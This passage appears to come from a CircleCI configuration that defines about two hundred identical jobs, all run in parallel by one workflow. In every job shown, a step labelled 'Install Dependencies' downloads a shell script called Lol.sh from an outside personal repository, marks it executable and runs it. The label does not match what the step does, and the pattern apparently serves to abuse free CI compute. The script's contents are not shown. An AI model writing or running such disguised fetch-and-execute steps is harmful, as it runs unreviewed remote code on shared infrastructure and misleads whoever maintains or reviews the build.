            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku140:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku141:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku142:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku143:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku144:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku145:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku146:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku147:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku148:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku149:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku150:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku151:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku152:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku153:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku154:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku155:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku156:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku157:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku158:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku159:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku160:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku161:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku162:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku163:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku164:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku165:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku166:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku167:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku168:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku169:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku170:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku171:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku172:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku173:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku174:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku175:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku176:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku177:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku178:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku179:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku180:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku181:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku182:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku183:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku184:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku185:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku186:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku187:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku188:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku189:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku190:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku191:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku192:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku193:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku194:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku195:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku196:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku197:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku198:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku199:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku200:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    
workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30
            - aku31
            - aku32
            - aku33
            - aku34
            - aku35
            - aku36
            - aku37
            - aku38
            - aku39
            - aku40
            - aku41
            - aku42
            - aku43
            - aku44
            - aku45
            - aku46
            - aku47
            - aku48
            - aku49
            - aku50
            - aku51
            - aku52
            - aku53
            - aku54
            - aku55
            - aku56
            - aku57
            - aku58
            - aku59
            - aku60
            - aku61
            - aku62
            - aku63
            - aku64
            - aku65
            - aku66
            - aku67
            - aku68
            - aku69
            - aku70
            - aku71
            - aku72
            - aku73
            - aku74
            - aku75
            - aku76
            - aku77
            - aku78
            - aku79
            - aku80
            - aku81
            - aku82
            - aku83
            - aku84
            - aku85
            - aku86
            - aku87
            - aku88
            - aku89
            - aku90
            - aku91
            - aku92
            - aku93
            - aku94
            - aku95
            - aku96
            - aku97
            - aku98
            - aku99
            - aku100
            - aku101
            - aku102
            - aku103
            - aku104
            - aku105
            - aku106
            - aku107
            - aku108
            - aku109
            - aku110
            - aku111
            - aku112
            - aku113
            - aku114
            - aku115
            - aku116
            - aku117
            - aku118
            - aku119
            - aku120
            - aku121
            - aku122
            - aku123
            - aku124
            - aku125
            - aku126
            - aku127
            - aku128
            - aku129
            - aku130
            - aku131
            - aku132
            - aku133
            - aku134
            - aku135
            - aku136
            - aku137
            - aku138
            - aku139
            - aku140
            - aku141
            - aku142
            - aku143
            - aku144
            - aku145
            - aku146
            - aku147
            - aku148
            - aku149
            - aku150
            - aku151
            - aku152
            - aku153
            - aku154
            - aku155
            - aku156
            - aku157
            - aku158
            - aku159
            - aku160
            - aku161
            - aku162
            - aku163
            - aku164
            - aku165
            - aku166
            - aku167
            - aku168
            - aku169
            - aku170
            - aku171
            - aku172
            - aku173
            - aku174
            - aku175
            - aku176
            - aku177
            - aku178
            - aku179
            - aku180
            - aku181
            - aku182
            - aku183
            - aku184
            - aku185
            - aku186
            - aku187
            - aku188
            - aku189
            - aku190
            - aku191
            - aku192
            - aku193
            - aku194
            - aku195
            - aku196
            - aku197
            - aku198
            - aku199
            - aku200